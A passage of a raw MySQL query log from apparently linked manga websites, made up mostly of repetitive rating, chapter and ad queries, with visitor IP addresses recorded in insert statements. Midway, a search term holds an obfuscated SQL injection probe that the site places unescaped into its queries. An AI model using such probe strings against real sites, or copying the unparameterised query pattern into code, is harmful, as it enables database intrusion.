as average_rating FROM ratings where manga_id = '197' order by created desc 330640215 Quit 330640216 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640216 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330640216 Quit 330640217 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640217 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330640217 Quit 330640218 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640218 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '290' order by created desc 330640218 Quit 330640219 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640219 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330640219 Quit 330640220 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640220 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330640220 Quit 330640221 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640221 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '239' order by created desc 330640221 Quit 330640222 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640222 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '288' order by created desc 330640222 Quit 330640223 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640223 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330640223 Quit 330640224 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640224 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330640224 Quit 330640225 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640225 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330640225 Quit 330640226 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640226 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330640226 Quit 330640227 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640227 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330640227 Quit 330640228 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640228 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330640228 Quit 330640229 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640229 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330640229 Quit 330640230 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640230 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330640230 Quit 330640231 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640231 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330640231 Quit 330640232 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640232 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330640232 Quit 330640233 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640233 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330640233 Quit 330640234 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640234 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330640234 Quit 330640235 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640235 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330640235 Quit 330640236 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640236 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330640236 Quit 330640237 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640237 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330640237 Quit 330640238 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640238 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '228' order by created desc 330640238 Quit 330640239 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640239 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330640239 Quit 330640240 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640240 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330640240 Quit 330640241 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640241 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330640241 Quit 330640242 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640242 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '223' order by created desc 330640242 Quit 330640243 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640243 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330640243 Quit 330640244 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640244 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330640244 Quit 330640245 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640245 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330640245 Quit 330640246 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640246 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '230' order by created desc 330640246 Quit 330640247 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640247 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330640247 Quit 330640248 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640248 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330640248 Quit 330640249 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640249 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330640249 Quit 330640250 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640250 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330640250 Quit 330640251 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640251 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330640251 Quit 330640252 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640252 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330640252 Quit 330640253 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640253 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330640253 Quit 330640254 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640254 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330640254 Quit 330640255 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640255 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '303' order by created desc 330640255 Quit 330640256 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640257 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640256 Quit 330640257 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330640015 Quit 330640258 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640259 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640258 Quit 330640259 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640259 Quit 330640260 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640261 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640260 Quit 330640261 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640261 Quit 330640262 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640263 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640262 Quit 330640263 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640263 Quit 330640264 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640265 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640264 Quit 330640265 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640265 Quit 330640266 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640267 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640266 Quit 330640267 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12973' and m.active = 1 330640267 Quit 330640268 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640268 Query select * FROM chapters where id = '12973' 330640268 Quit 330640269 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640269 Query select * FROM chapters where manga_id = '267' order by display_priority ASC, id desc 330640269 Quit 330640270 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640270 Query Update chapters set view=view+1 where id = '12973' 330640270 Quit 330640271 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640271 Query select * FROM chapters where id = '12973' 330640272 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640271 Quit 330640272 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12973' and m.active = 1 330640272 Quit 330640273 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640273 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('267', '12973', '93.226.134.179', 'mangaberri.com', '2026-02-26 03:28:04', '2026-02-26 03:28:04') 330640273 Quit 330640274 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640274 Query select * FROM chapter_images where chapter_id = '12973' 330640274 Quit 330640275 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640275 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '267' and m.active = 1 330640275 Quit 330640276 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640276 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='267' and m.active = 1 AND (genres like '%Action%' OR genres like '%Fantasy%' OR genres like '%Manhwa/Manhua%' OR genres like '%Martial Arts%') ORDER BY RAND() limit 10 330640276 Quit 330640277 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640278 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640277 Quit 330640278 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640278 Quit 330640279 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640280 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640279 Quit 330640280 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640280 Quit 330640281 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640282 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640281 Quit 330640282 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640282 Quit 330640283 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640284 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330640283 Quit 330640284 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330640284 Quit 330640257 Quit 330640285 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640285 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330640285 Quit 330640286 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640286 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330640286 Quit 330640287 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640288 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640287 Quit 330640288 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640288 Quit 260225 19:28:05 330640289 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640290 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640289 Quit 330640290 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1And//5862((sELecT//case//5862//When//5862//tHen//1//ELSE//0//EnD//FROm//rdbdATAbaSe)) OR Rc9mSbmGgY', '169.150.196.30', '2026-02-26 03:28:05') 330640290 Quit 330640291 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640291 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1And//5862((sELecT//case//5862//When//5862//tHen//1//ELSE//0//EnD//FROm//rdbdATAbaSe)) OR Rc9mSbmGgY%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1And//5862((sELecT//case//5862//When//5862//tHen//1//ELSE//0//EnD//FROm//rdbdATAbaSe)) OR Rc9mSbmGgY%' ) ) 330640291 Quit 330640292 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640292 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'%A%n%d%/%*%*%/%5%8%6%2%=%(%\'%~%\'%|%|%(%s%E%L%e%c%T%/%*%*%/%c%a%s%e%/%*%*%/%5%8%6%2%/%*%*%/%W%h%e%n%/%*%*%/%5%8%6%2%/%*%*%/%t%H%e%n%/%*%*%/%1%/%*%*%/%E%L%S%E%/%*%*%/%0%/%*%*%/%E%n%D%/%*%*%/%F%R%O%m%/%*%*%/%r%d%b%$%d%A%T%A%b%a%S%e%)%|%|%\'%~%\'%) OR \'Rc9mSbmG\'=\'gYVXJB4J' 330640292 Quit 330640293 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640293 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330640293 Quit 330640294 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640295 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640294 Quit 330640295 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330640295 Quit 330640296 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640296 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330640296 Quit 330640297 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640297 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330640297 Quit 330640298 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640298 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330640298 Quit 330640299 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640299 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330640299 Quit 330640300 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640300 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330640300 Quit 330640301 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640301 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330640301 Quit 330640302 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640302 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330640302 Quit 330640303 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640303 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330640303 Quit 330640304 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640304 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330640304 Quit 330640305 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640305 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330640305 Quit 330640306 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640306 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330640306 Quit 330640307 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640307 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330640307 Quit 330640308 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640308 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330640308 Quit 330640309 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640309 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330640309 Quit 330640310 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640310 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330640310 Quit 330640311 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640311 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330640311 Quit 330640312 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640312 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330640312 Quit 330640313 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640313 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330640313 Quit 330640314 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640314 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330640314 Quit 330640315 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640315 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330640315 Quit 330640316 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640316 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330640316 Quit 330640317 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640317 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330640317 Quit 330640318 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640318 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330640318 Quit 330640319 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640319 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330640319 Quit 330640320 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640320 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330640320 Quit 330640321 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640321 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330640321 Quit 330640322 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640322 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330640322 Quit 330640323 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640323 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330640323 Quit 330640324 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640324 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330640324 Quit 330640325 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640325 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330640325 Quit 330640326 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640326 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330640326 Quit 330640327 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640327 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330640327 Quit 330640328 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640328 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330640328 Quit 330640329 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640329 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330640329 Quit 330640330 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640330 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330640330 Quit 330640331 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640331 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '192' order by created desc 330640331 Quit 330640332 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640332 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '92' order by created desc 330640332 Quit 330640333 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640333 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '7' order by created desc 330640333 Quit 330640334 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640334 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '45' order by created desc 330640334 Quit 330640335 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640335 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '207' order by created desc 330640335 Quit 330640336 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640336 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '232' order by created desc 330640336 Quit 330640337 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640337 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330640337 Quit 330640338 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640338 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '47' order by created desc 330640338 Quit 330640339 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640339 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '74' order by created desc 330640339 Quit 330640340 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640340 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330640340 Quit 330640341 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640341 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '252' order by created desc 330640341 Quit 330640342 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640342 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '12' order by created desc 330640342 Quit 330640343 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640343 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '54' order by created desc 330640343 Quit 330640344 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640344 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330640344 Quit 330640345 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640345 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '9' order by created desc 330640345 Quit 330640346 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640346 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '214' order by created desc 330640346 Quit 330640347 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640347 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '240' order by created desc 330640347 Quit 330640348 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640348 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '46' order by created desc 330640348 Quit 330640349 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640349 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '225' order by created desc 330640349 Quit 330640350 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640350 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '130' order by created desc 330640350 Quit 330640351 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640351 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330640351 Quit 330640352 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640352 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '217' order by created desc 330640352 Quit 330640353 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640353 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '50' order by created desc 330640353 Quit 330640354 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640354 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '31' order by created desc 330640354 Quit 330640355 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640355 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '244' order by created desc 330640355 Quit 330640356 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640356 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '5' order by created desc 330640356 Quit 330640357 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640357 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '66' order by created desc 330640357 Quit 330640358 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640358 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '32' order by created desc 330640358 Quit 330640359 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640359 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '58' order by created desc 330640359 Quit 330640360 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330640360 Query select count(id) 